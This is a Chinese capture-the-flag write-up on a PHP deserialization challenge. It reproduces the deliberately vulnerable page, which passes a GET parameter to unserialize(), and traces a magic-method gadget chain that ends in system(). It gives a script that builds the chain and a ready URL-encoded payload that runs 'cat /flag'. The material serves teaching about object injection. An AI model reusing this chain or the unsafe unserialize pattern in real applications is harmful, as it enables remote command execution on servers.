进入首页代码如下:
<?php
// Prints this file's own source so the classes below can be audited; the
// challenge is meant to be solved by reading them, not by guessing.
highlight_file(__file__);
// Gadget #2 of the chain. Reached when Ha::__destruct calls ->Love() on an Rd
// instance: Rd declares no Love(), so PHP dispatches the call to __call below.
Class Rd{
public $ending;
public $cl;
public $poc;
// Runs when the Rd object is freed; die() prints $ending and stops the script.
// In the working payload $ending is left null, and this destructor only runs
// after Ha::__destruct has already fired the rest of the chain.
public function __destruct()
{
echo "All matters have concluded";
die($this->ending);
}
// $name is the undefined method's name (ignored), $arg its argument list.
// Note the loose == comparison, and that $arg[0] is tested on every iteration,
// so the write below repeats once per argument while the check holds.
public function __call($name, $arg)
{
foreach ($arg as $key =>$value)
{
if($arg[0]['POC']=="1111")
{
echo "1";
// $cl is attacker-controlled. If it is an object with no declared var1
// property, this assignment is routed to that object's __set("var1", "system").
$this->cl->var1 = "system";
}
}
}
}
// Not part of the working chain: nothing in this file writes to an undeclared
// Poc property or calls getflag(), so this class is a decoy for the reader.
class Poc{
    public $payload;
    public $fun;
    // Records the most recent write to an undeclared property:
    // the property name goes to $payload, the written value to $fun.
    public function __set($name, $value)
    {
        [$this->payload, $this->fun] = [$name, $value];
    }
    // Prints a taunt and reads the file named by $paylaod (parameter name kept
    // as in the original). The contents are discarded; nothing is returned.
    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?";
        file_get_contents($paylaod);
    }
}
// Gadget #3, the sink. Any write to an undeclared property (e.g. ->var1 from
// Rd::__call) lands in __set, which treats the written value as a function name.
class Er{
public $symbol;
public $Flag;
// Not invoked by unserialize(); only `new Er()` sets $symbol, and the chain
// never reads it.
public function __construct()
{
$this->symbol = True;
}
// $value is called as a function with $this->Flag as its only argument. With
// $value = "system" and $Flag taken from the payload this is attacker-controlled
// command execution: system("cat /flag"). $name (the property written) is ignored.
public function __set($name, $value)
{
$value($this->Flag);
}
}
// Gadget #1, the entry point of the chain: its destructor runs as soon as the
// object returned by unserialize() is discarded.
class Ha{
public $start;
public $start1;
public $start2;
// Not run by unserialize(). It string-concatenates $start1, which would fail for
// an object without __toString; irrelevant on the deserialization path.
public function __construct()
{
echo $this->start1."__construct"."</br>";
}
// Strict comparison: $start2 must be the string "11111" (not an int) in the
// payload. Calling Love() on $start1 — any attacker-chosen object — reaches that
// object's __call when the method is undefined, with $start as the sole argument.
public function __destruct()
{
if($this->start2==="11111") {
$this->start1->Love($this->start);
echo "You are Good!";
}
}
}
// Entry point. The only input is the Ha_rde_r query parameter, and it goes
// straight into unserialize(): any class declared above can be instantiated
// with attacker-chosen property values, and its magic methods
// (__destruct / __call / __set) then run on that data. The return value is
// discarded, so the object's destructor fires immediately. Passing
// ['allowed_classes' => false] (or using json_decode) would break the chain.
if (!isset($_GET['Ha_rde_r'])) {
    die("You are Silly goose!");
}
unserialize($_GET['Ha_rde_r']);
?>
通过审计代码,大概构造出pop链如下:
Ha::__destruct (start2 === "11111") -> Rd::__call (start1 没有 Love() 方法, 检查 $arg[0]['POC'] == "1111") -> Er::__set (cl 没有 var1 属性, $value = "system") -> $value($this->Flag) 即 system("cat /flag")
构造字符串:
<?php
// Minimal stand-in for the target's Rd: same property names in the same
// declaration order, so serialize() emits a matching O:2:"Rd":3:{...} record.
// The magic methods are deliberately omitted so nothing fires while building.
Class Rd
{
    public $ending, $cl, $poc;
}
// Stand-in for the target's Er (the sink). Only the property layout matters;
// __construct and __set are left out so the local script cannot call anything.
class Er
{
    public $symbol, $Flag;
}
// Stand-in for the target's Ha (chain entry). start2 is given its value as a
// property default because unserialize() never runs __construct on the target,
// and Ha::__destruct compares it strictly against the string "11111".
class Ha
{
    public $start, $start1;
    public $start2 = "11111";
}
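// Build the payload object graph. Property names and declaration order must
// match the target's classes exactly: unserialize() maps fields by name and
// never runs __construct, so start2 relies on the stub's default value.
$ha = new Ha();

// Ha::__destruct passes $start to $start1->Love(); Rd has no Love(), so
// Rd::__call receives it as $arg[0] — hence a one-element array keyed POC.
$ha->start = array(
    "POC" => "1111"
);

// Rd::__call writes $this->cl->var1 = "system"; Er declares no var1, so
// Er::__set fires with $value = "system" and calls system($this->Flag).
$sink = new Er();
$sink->Flag = "cat /flag";

$caller = new Rd();
$caller->cl = $sink;
$ha->start1 = $caller;

// URL-encode so the serialized string survives the GET query string
// (the space in "cat /flag" becomes "+"; the target decodes it before unserialize()).
echo urlencode(serialize($ha));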
?>
以 GET 参数 Ha_rde_r 传入上述字符串即可拿到 flag: unserialize() 的返回值没有被使用, Ha 对象随即析构并触发整条链, system("cat /flag") 的输出会先于 Rd::__destruct 中的 die() 打印出来。
?Ha_rde_r=O%3A2%3A%22Ha%22%3A3%3A%7Bs%3A5%3A%22start%22%3Ba%3A1%3A%7Bs%3A3%3A%22POC%22%3Bs%3A4%3A%221111%22%3B%7Ds%3A6%3A%22start1%22%3BO%3A2%3A%22Rd%22%3A3%3A%7Bs%3A6%3A%22ending%22%3BN%3Bs%3A2%3A%22cl%22%3BO%3A2%3A%22Er%22%3A2%3A%7Bs%3A6%3A%22symbol%22%3BN%3Bs%3A4%3A%22Flag%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A3%3A%22poc%22%3BN%3B%7Ds%3A6%3A%22start2%22%3Bs%3A5%3A%2211111%22%3B%7D